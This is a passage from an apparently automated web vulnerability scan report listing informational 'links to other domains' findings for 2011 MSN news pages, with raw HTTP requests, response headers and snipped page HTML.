<div>A woman is being held by Dallas police (where <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+hiding+in+house&amp;go=&amp;form=msnpop">was she hiding</a>?) after an argument with her mom allegedly got out of control. Police say a neighbor reported seeing her run over her mom with her car. (How are officials <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+homicide&amp;form=msnpop">treating the death</a>?) Police say the incident could be downgraded... <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+The+daughter+could+have+been+trying+to+leave+&amp;go=&amp;form=msnpop">Here...s why</a>
...[SNIP]...
<div>A wrongly convicted man has been freed from a Dallas prison. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+man+freed+and+25+years&amp;form=msnpop">How long</a>
...[SNIP]...
<div>A bomb scare was reported at the Super Bowl stadium. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+and+bomb+scare+and+false+alarm&amp;form=msnpop">Here...s what</a>
...[SNIP]...
<div>A reported kidnapping turned out to be a ruse. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+and+baby+found+and+kidnapping+and+charges&amp;form=msnpop">Here...s who</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.319. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx?cp-documentid=27451865 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:10 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e119fcb6facb4371bb05f28dcc151a9d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=755CD5C48CE44552BF5BD6BADC2AB2CE; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:10 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406690&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FDaughter-held-in-moms-run-over-death.aspx%3Fcp-documentid%3D27451865&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+death"><strong>
...[SNIP]...
<div>A woman is being held by Dallas police (where <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+hiding+in+house&amp;go=&amp;form=msnpop">was she hiding</a>?) after an argument with her mom allegedly got out of control. Police say a neighbor reported seeing her run over her mom with her car. (How are officials <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+homicide&amp;form=msnpop">treating the death</a>?) Police say the incident could be downgraded... <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+The+daughter+could+have+been+trying+to+leave+&amp;go=&amp;form=msnpop">Here...s why</a>
...[SNIP]...
<div>A wrongly convicted man has been freed from a Dallas prison. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+man+freed+and+25+years&amp;form=msnpop">How long</a>
...[SNIP]...
<div>A bomb scare was reported at the Super Bowl stadium. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+and+bomb+scare+and+false+alarm&amp;form=msnpop">Here...s what</a>
...[SNIP]...
<div>A reported kidnapping turned out to be a ruse. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+and+baby+found+and+kidnapping+and+charges&amp;form=msnpop">Here...s who</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.320. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Egypt-new-vp.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Egypt-new-vp.aspx?cp-documentid=27465292 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d8cb75d8c590478fa0ae0a73bb33ed15; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8473F648A77445E0BFB3892157C075FF; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:58 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345058&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FEgypt-new-vp.aspx%3Fcp-documentid%3D27465292&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Egypt%27s+president+deputy&amp;form=msnpop"><strong>
...[SNIP]...
<div>Egyptian President <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Hosni+Mubarak&amp;go=&amp;form=msnpop">Hosni Mubarak</a> appointed <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Egypt%27s+president+deputy&amp;form=msnpop">Omar Suleiman</a> the country's' vice president on Saturday morning... It's the first time Mubarak has had a deputy since coming to power decades ago. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mubarak+first+vice+president+since+1981&amp;FORM=msnpop">Find out when</a>
...[SNIP]...
<div>Many people in Egypt are demanding that the <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mubarak+step+down&amp;form=msnpop">president do this</a>
...[SNIP]...
<div>An <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=king+tut+egypt&amp;form=msnpop">ancient Egyptian pharaoh's</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/blogs/search?q=egypt+protests&amp;form=msnpop">Read blogs</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.321. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Egypt-new-vp.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Egypt-new-vp.aspx?cp-documentid=27465292 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:54 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c7f8a74d7f294ee18060460210007360; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=78C846067A514FC896C09A8CA0A04391; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406674&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FEgypt-new-vp.aspx%3Fcp-documentid%3D27465292&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Egypt%27s+president+deputy&amp;form=msnpop"><strong>
...[SNIP]...
<div>Egyptian President <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Hosni+Mubarak&amp;go=&amp;form=msnpop">Hosni Mubarak</a> appointed <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Egypt%27s+president+deputy&amp;form=msnpop">Omar Suleiman</a> the country's' vice president on Saturday morning... It's the first time Mubarak has had a deputy since coming to power decades ago. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mubarak+first+vice+president+since+1981&amp;FORM=msnpop">Find out when</a>
...[SNIP]...
<div>Many people in Egypt are demanding that the <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mubarak+step+down&amp;form=msnpop">president do this</a>
...[SNIP]...
<div>An <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=king+tut+egypt&amp;form=msnpop">ancient Egyptian pharaoh's</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/blogs/search?q=egypt+protests&amp;form=msnpop">Read blogs</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.322. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Famous-escapes.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Famous-escapes.aspx?cp-documentid=27422805&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:57 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b9a5467964e9490f85dc4b648cc78c01; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E0AB5751ECAB4030A6E2D3C5BB4F69BD; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:57 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 32863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345057&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FFamous-escapes.aspx%3Fcp-documentid%3D27422805%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=famous+escapes&amp;form=msnhal"><strong>
...[SNIP]...
<div>As long as there have been ways to incarcerate people -- whether <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=prisons&amp;form=msnhal">behind bars</a> or <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=slavery&amp;form=msnhal">through immoral ownership</a> -- there have been escapes. Some are unsuccessful, such as the recent case of a 20-year-old man who jumped out of a moving police car, pictured here. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Nicholas+Duffy+friction+burns+to+hands&amp;form=msnhal">Find out</a> what his injuries were.) And others are daring and brave and are among some of the most <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=famous+escapes&amp;form=msnhal">famous escapes in history</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.323. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Famous-escapes.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Famous-escapes.aspx?cp-documentid=27422805&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=efddc12812564ba6a80ea05f8f5b6321; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DD660A4C77AF420BB580B7A65058D295; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 32843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
